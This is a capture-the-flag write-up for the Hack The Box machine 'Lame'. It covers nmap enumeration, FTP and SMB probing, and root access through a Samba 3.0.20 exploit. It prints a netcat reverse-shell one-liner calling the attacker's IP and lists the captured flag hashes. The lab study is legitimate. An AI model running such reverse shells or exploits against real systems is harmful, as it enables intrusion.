Recon
What we know before interacting with the box:
- Name: LAME
- IP: 10.10.10.3
- Level: Very easy
- OS: Linux
- Flag: 2 (User and Root Flag)
- Common and real world vulnerability. Maybe related to previous Box.
- Attacker IP: 10.10.16.223
Enumeration
First, give it an initial nmap enumeration
nmap -sV -A 10.10.10.3
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
| OS: Unix (Samba 3.0.20-Debian)
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-08-26T13:12:53-04:00
Recap
– Domain: hackthebox.gr
– vsftpd 2.3.4running on port 21
– SSH 4.7p1 running on port 22
– And 139,445 ports serve SMB à This is not SMB service on Windows but on Linux. And the service used here is Samba smbd 3.0.20-Debian
Pentest FTP
As FTP supports anonymous login, I have a go at this FTP connection.
(kali) ftp 10.10.10.3
Look like some filters prevent me from accessing data. Nothing’s here.
Search for exploit vsftpd 2.3.4 on google.
Tried a python script exploit for vsftpd but not work
Pentest SMB
I used smbmap to check for public share.
Well, we can READ,WRITE to tmp. I used smbclient to acess this folder but got error.
Search for this error message on google and I found one solution
Now smbclient works properly
Check for files on tmp folder, but got no useful information.
Exploit Samba 3.0.20
Search for exploit Samba version 3.0.20 on google and I found a python script macha97/exploit-smb-3.0.20 – GitHub
This script requires a payload created from msfvenom
This buf string actually is just a Bash reverse shell:
(buf) mkfifo /tmp/cewoh; nc 10.10.16.223 4444 0</tmp/cewoh | /bin/sh >/tmp/cewoh 2>&1; rm /tmp/cewoh
The complete exploit script is like
Use python3 to run it
And I got shell from netcat listener
Greatly, my shell is already root. Go get user flag and root flag at once. There’s several users at /home
I find for .txt file for quickly get user flag.
(user flag) 83f38774483206d7c54299b9dd2e3a89
And the root flag is at /root/root.txt as usual
(root flag) 3bc8b537695679e5eb8cb0aeb9e2cb13
Lessons learned
- SMB service (port 139,445 open) also exists on Linux.
- Samba 3.0.20 is vulnerable to such a critical bug as it could lead to RCE as ROOT.
References
https://book.hacktricks.xyz/pentesting/pentesting-ftp
https://book.hacktricks.xyz/pentesting/pentesting-smb
https://serverfault.com/questions/137135/what-does-nt-status-bad-network-name-mean-in-samba
https://github.com/macha97/exploit-smb-3.0.20/blob/master/exploit-smb-3.0.20.py